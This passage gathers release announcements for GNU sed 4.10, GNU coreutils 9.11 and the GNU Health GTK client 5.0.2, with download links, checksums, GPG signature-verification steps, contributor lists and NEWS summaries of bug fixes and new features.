for all their help, and especially to Bruno for all the gnulib
support and thorough and indefatigable testing and analysis.

There have been 92 commits by 9 people in the 180 weeks since 4.9.

See the NEWS below for a brief summary.

Thanks to everyone who has contributed!
The following people contributed changes to this release:

  Arkadiusz Drabczyk (2)
  Ash Roberts (1)
  Brun Haible (1)
  Bruno Haible (5)
  Collin Funk (5)
  Hans Ginzel (1)
  Jim Meyering (60)
  Paul Eggert (16)
  Weixie Cui (1)

Jim
 [on behalf of the sed maintainers]
==================================================================

Here is the GNU sed home page:
    https://gnu.org/s/sed/

Here are the compressed sources:
  https://ftp.gnu.org/gnu/sed/sed-4.10.tar.gz   (2.7MB)
  https://ftp.gnu.org/gnu/sed/sed-4.10.tar.xz   (1.7MB)

Here are the GPG detached signatures:
  https://ftp.gnu.org/gnu/sed/sed-4.10.tar.gz.sig
  https://ftp.gnu.org/gnu/sed/sed-4.10.tar.xz.sig

Use a mirror for higher download bandwidth:
  https://www.gnu.org/order/ftp.html

Here are the SHA256 and SHA3-256 checksums:

  SHA256 (sed-4.10.tar.gz) = TRef+vkuxNzsVB98Ayvhw7mhhW9JcK25WlBSIXAvUnc=
  SHA3-256 (sed-4.10.tar.gz) = ftB7Hf2uN4RnayBEgasV7KmqZqCxBUj7e+Am6WDaiKk=
  SHA256 (sed-4.10.tar.xz) = uOchgrLslqNXTimYxHt6qmTMIM4ADY6awxPMB87PKMc=
  SHA3-256 (sed-4.10.tar.xz) = bVWJvXR28fvhgP1XTpej6t8V+Bh2YI1lL6aGBy1cG5c=

Verify the base64 SHA256 checksum with 'cksum -a sha256 --check'
from coreutils-9.2 or OpenBSD's cksum since 2007.

Verify the base64 SHA3-256 checksum with 'cksum -a sha3 --check'
from coreutils-9.8.

Use a .sig file to verify that the corresponding file (without the
.sig suffix) is intact.  First, be sure to download both the .sig file
and the corresponding tarball.  Then, run a command like this:

  gpg --verify sed-4.10.tar.gz.sig

The signature should match the fingerprint of the following key:

  pub   rsa4096/0x7FD9FCCB000BEEEE 2010-06-14 [SCEA]
        Key fingerprint = 155D 3FC5 00C8 3448 6D1E  EA67 7FD9 FCCB 000B EEEE
  uid                   [ unknown] Jim Meyering <jim@meyering.net>
  uid                   [ unknown] Jim Meyering <meyering@fb.com>
  uid                   [ unknown] Jim Meyering <meyering@gnu.org>

If that command fails because you don't have the required public key,
or that public key has expired, try the following commands to retrieve
or refresh it, and then rerun the 'gpg --verify' command.

  gpg --locate-external-key jim@meyering.net

  gpg --recv-keys 7FD9FCCB000BEEEE

  wget -q -O- 'https://savannah.gnu.org/project/release-gpgkeys.php?group=sed&download=1' | gpg --import -

As a last resort to find the key, you can try the official GNU
keyring:

  wget -q https://ftp.gnu.org/gnu/gnu-keyring.gpg
  gpg --keyring gnu-keyring.gpg --verify sed-4.10.tar.gz.sig

This release is based on the sed git repository, available as

  git clone https://https.git.savannah.gnu.org/git/sed.git

with commit 89b7a2224d4faa9d8baf76094b1232ad1477ef3e tagged as v4.10.

For a summary of changes and contributors, see:

  https://gitweb.git.savannah.gnu.org/gitweb/?p=sed.git;a=shortlog;h=v4.10

or run this command from a git-cloned sed directory:
  git shortlog v4.9..v4.10

This release was bootstrapped with the following tools:
  Autoconf 2.73.1-b400b
  Automake 1.18.1.91
  Gnulib 2026-04-19 15211966deb52d4cae425c655177a815a88d3fc0

NEWS

* Noteworthy changes in release 4.10 (2026-04-21) [stable]

** Bug fixes

  sed 's/a/b/g' (and other global substitutions) now works on input
  lines longer than 2GB. Previously, matches beyond the 2^31 byte offset
  would evoke a "panic" (exit 4).
  [bug present since the beginning]

  'sed --follow-symlinks -i' no longer has a TOCTOU race that could let
  an attacker swap a symlink between resolution and open, causing sed to
  read attacker-chosen content and write it to the original target.
  [bug introduced in sed 4.1e]

  sed no longer falsely matches when back-references are combined with
  optional groups (.?) and the $ anchor.  For example, this no longer
  falsely matches the empty string at beginning of line:
    $ echo ab | sed -E 's/^(.?)(.?).?\2\1$/X/'
    Xab
  [bug present since "the beginning"]

  In --posix mode, sed no longer mishandles backslash escapes (\n,
  \t, \a, etc.) after a named character class like [[:alpha:]].
  For example, 's/^A\n[[:alpha:]]\n*/XXX/' would fail to match the
  trailing newline, treating \n as a literal backslash and an 'n'
  rather than a newline.  This happened when an earlier backslash
  escape in the same regex had already been converted, shifting the
  in-place normalization buffer.
  [bug introduced in sed 4.9]

  sed --debug no longer crashes when a label (":") command is compiled
  before the --debug option is processed, e.g., sed -f<(...) --debug.
  [bug introduced in sed 4.7 with --debug]

  sed no longer rejects the documented GNU extension 'a**' (equivalent
  to 'a*') in Basic Regular Expression (BRE) mode.  Previously, this
  worked only with -E (ERE mode), even though grep has always accepted
  it in BRE mode.
  [bug present since "the beginning"]

  sed no longer rejects "\c[" in regular expressions
  [bug present since the beginning]

  'sed --follow-symlinks -i' no longer mishandles an operand that is a
  short symbolic link to a long symbolic link to a file.
  [bug introduced in sed 4.9]

  Fix some some longstanding but unlikely integer overflows.
  Internally, 'sed' now more often prefers signed integer arithmetic,
  which can be checked automatically via 'gcc -fsanitize=undefined'.

** Changes in behavior

  In the default C locale, diagnostics now quote 'like this' (with
  apostrophes) instead of `like this' (with a grave accent and an
  apostrophe).  This tracks the GNU coding standards.

  'sed --posix' now warns about uses of backslashes in the 's' command
  that are handled by GNU sed but are not portable to other
  implementations.

** Build-related

  builds no longer fail on platforms without the <getopt.h> header or
  getopt_long function.
  [bug introduced in sed 4.9]

This is to announce coreutils-9.11, a stable release.

Notable changes include:
 - cut(1), nl(1), and un/expand(1) are multi-byte character aware
 - cut(1) supports new -w, -F, -O options for better compatibility
 - cat(1) and yes(1) use zero-copy I/O on Linux (up to 15x faster)
 - date(1) now parses dot delimited dd.mm.yy format
 - cksum --check uses more defensive file name quoting
 - shuf -i operates up to 2x faster by using unlocked stdio
 - wc -l operates up to 4.5x faster on hosts with neon instructions
 - wc -m is up to 2.6x faster when processing multi-byte characters

There have also been many bug fixes and other changes
as summarized in the NEWS below.

There have been 306 commits by 12 people in the 10 weeks since 9.10
Thanks to everyone who has contributed!

  Bruno Haible (2)                Paul Eggert (15)
  Chris Down (2)                  Pádraig Brady (156)
  Collin Funk (91)                Sam James (1)
  Dr. David Alan Gilbert (1)      Sylvestre Ledru (17)
  Gabriel (1)                     Weixie Cui (2)
  Lukáš Zaoral (2)                oech3 (19)

Pádraig [on behalf of the coreutils maintainers]
==================================================================

Here is the GNU coreutils home page:
    https://gnu.org/s/coreutils/

Here are the compressed sources:
  https://ftp.gnu.org/gnu/coreutils/coreutils-9.11.tar.gz   (16MB)
  https://ftp.gnu.org/gnu/coreutils/coreutils-9.11.tar.xz   (6.3MB)

Here are the GPG detached signatures:
  https://ftp.gnu.org/gnu/coreutils/coreutils-9.11.tar.gz.sig
  https://ftp.gnu.org/gnu/coreutils/coreutils-9.11.tar.xz.sig

Use a mirror for higher download bandwidth:
  https://www.gnu.org/order/ftp.html

Here are the SHA256 and SHA3-256 checksums:

  SHA256 (coreutils-9.11.tar.gz) = IDO4owScBr/0mp486nK99Gg7zQy+uXUhHdVtuvi3Nq4=
  SHA3-256 (coreutils-9.11.tar.gz) = TwFrSgPuppf+jNggT+aXj037UfVVS2BmYBxXiPLYKxs=
  SHA256 (coreutils-9.11.tar.xz) = OUAk7aCllVIXztqc0SAeZdyPo6opwpURNaSVIdV8PMM=
  SHA3-256 (coreutils-9.11.tar.xz) = RkpNMip8O4ly+z3Fef9X20AsotbT1ycBZ5UbG84SiNM=

Verify the base64 SHA256 checksum with 'cksum -a sha256 --check'
from coreutils-9.2 or OpenBSD's cksum since 2007.

Verify the base64 SHA3-256 checksum with 'cksum -a sha3 --check'
from coreutils-9.8.

Use a .sig file to verify that the corresponding file (without the
.sig suffix) is intact.  First, be sure to download both the .sig file
and the corresponding tarball.  Then, run a command like this:

  gpg --verify coreutils-9.11.tar.gz.sig

The signature should match the fingerprint of the following key:

  pub   rsa4096/0xDF6FD971306037D9 2011-09-23 [SC]
        Key fingerprint = 6C37 DC12 121A 5006 BC1D  B804 DF6F D971 3060 37D9
  uid                   [ultimate] Pádraig Brady <P@draigBrady.com>
  uid                   [ultimate] Pádraig Brady <pixelbeat@gnu.org>

If that command fails because you don't have the required public key,
or that public key has expired, try the following commands to retrieve
or refresh it, and then rerun the 'gpg --verify' command.

  gpg --locate-external-key P@draigBrady.com

  gpg --recv-keys DF6FD971306037D9

  wget -q -O- 'https://savannah.gnu.org/project/release-gpgkeys.php?group=coreutils&download=1' | gpg --import -

As a last resort to find the key, you can try the official GNU
keyring:

  wget -q https://ftp.gnu.org/gnu/gnu-keyring.gpg
  gpg --keyring gnu-keyring.gpg --verify coreutils-9.11.tar.gz.sig

This release is based on the coreutils git repository, available as

  git clone https://https.git.savannah.gnu.org/git/coreutils.git

with commit c01fd163a47468a8296fb369f5233853bb551bb6 tagged as v9.11.

For a summary of changes and contributors, see:

  https://gitweb.git.savannah.gnu.org/gitweb/?p=coreutils.git;a=shortlog;h=v9.11

or run this command from a git-cloned coreutils directory:

  git shortlog v9.10..v9.11

This release was bootstrapped with the following tools:
  Autoconf 2.73.1-b400b
  Automake 1.18.1
  Gnulib 2026-04-19 fb7312fa8d3df29f0ca0678f669b9a5b88a078ec
  Bison 3.8.2

NEWS

* Noteworthy changes in release 9.11 (2026-04-20) [stable]

** Bug fixes

  'dd' now always diagnoses partial writes correctly upon write failure.
  Previously it may have indicated that only full writes were performed.
  [This bug was present in "the beginning".]

  'fold' will no longer truncate output when encountering 0xFF bytes.
  [bug introduced in coreutils-9.8]

  'fold' is again responsive to its input.  Previously it would have delayed
  processing until 256KiB was read from the input.
  [bug introduced in coreutils-9.8]

  'kill --help' now has links to valid anchors in the html manual.
  [bug introduced in coreutils-9.10]

  When configured with --enable-systemd, the commands 'pinky',
  'uptime', 'users', and 'who' no longer consider the systemd session
  classes 'greeter', 'lock-screen', 'background', 'background-light',
  and 'none' to be users.
  [bug introduced in coreutils-9.4]

  'pwd' on ancient systems will no longer overflow a buffer
  when operating in deep paths longer than twice the system PATH_MAX.
  [bug introduced in coreutils-9.6]

  'stat --printf=%%N' no longer performs unnecessary checks of the QUOTING_STYLE
  environment variable.
  [bug introduced in coreutils-8.26]

  'timeout' no longer exits abruptly when its parent is the init process, e.g.,
  when started by the entrypoint of a container.
  [bug introduced in coreutils-9.10]

** New Features

  'cut' now supports multi-byte input and delimiters.  Consequently
  the -c option is now honored, and no longer an alias for -b, and
  the -n option is now honored, and no longer ignored.
  Also the -d option supports multi-byte delimiters.

  'cut' adds new options for better compatibility:
  The -w,--whitespace-delimited option was added to support blank aligned fields
  and for better compatibility with FreeBSD/macOS.
  The -O option was added as an alias for the --output-delimiter option,
  for better compatibility with busybox/toybox.
  The -F option was added as an alias for -w -O ' '
  for better compatibility with busybox/toybox.

  'date --date' now parses dot delimited dd.mm.yy format common in Europe.
  This is in addition to the already supported mm/dd/yy and yy-mm-dd formats.

** Changes in behavior

  'cksum --check' now uses shell quoting when required, to more robustly
  escape file names output in diagnostics.
  This also affects md5sum, sha*sum, and b2sum.

** Improvements

  'cat' now uses zero-copy I/O on Linux when appropriate, to improve throughput.
  E.g., throughput improved 6x from 12.9GiB/s to 81.8GiB/s on a Power10 system.

  'df --local' recognises more file system types as remote.
  Specifically: autofs, ncpfs, smb, smb2, gfs, gfs2, userlandfs.

  'df' improves duplicate mount suppression, by checking each mount against
  all previously kept entries for the same device, not just the latest one.

  'expand' and 'unexpand' now support multi-byte characters.

  'groups' and 'id' will now exit sooner after a write error,
  which is significant when listing information for many users.

  'install' now allows the combination of the --compare and
  --preserve-timestamps options.

  'fold', 'join', 'numfmt', 'uniq' now use more consistent blank character
  determination on non GLIBC platforms.  For example \u3000 (ideographic space)
  will be considered a blank character on all platforms.

  'nl' now supports multi-byte --section-delimiter characters.

  'shuf -i' now operates up to two times faster on systems with unlocked stdio
  functions.

  'tac' will now exit sooner after a write error, which is significant when
  operating on a file with many lines.

  'timeout' now properly detects when it is reparented by a subreaper process on
  Linux instead of init, e.g., the 'systemd --user' process.

  'wc -l' now operates up to four and a half times faster on hosts that support
  Neon instructions.

  'wc -m' now operates up to 2.6 times faster on GLIBC when processing
  non-ASCII UTF-8 characters.

  'yes' now uses zero-copy I/O on Linux to significantly increase throughput.
  E.g., throughput improved 15x from 11.6GiB/s to 175GiB/s on a Power10 system.

** Build-related

  ./configure --enable-single-binary=hardlinks is now supported on systems
  with dash as the system shell at /bin/sh.
  [issue introduced in coreutils-9.10]

  The test suite may have failed with a "Hangup" error if run non-interactively.
  [issue introduced in coreutils-9.10]

Dear community

The GTK client 5.0.2 of the GNU Health Hospital and Health Management system has been released!

This is a maintenance patchset that fixes the following issues:

• Unknown icon error when registering gnu health local icons
• Swapped Export - import icons
• Update connection port number in README file
• GNU Health GTK client does not automatically discover plugins from gnuhealth_plugins

You can get the latest GNU Health client from GNU.org, Python Package Index or Codeberg.

Happy hacking!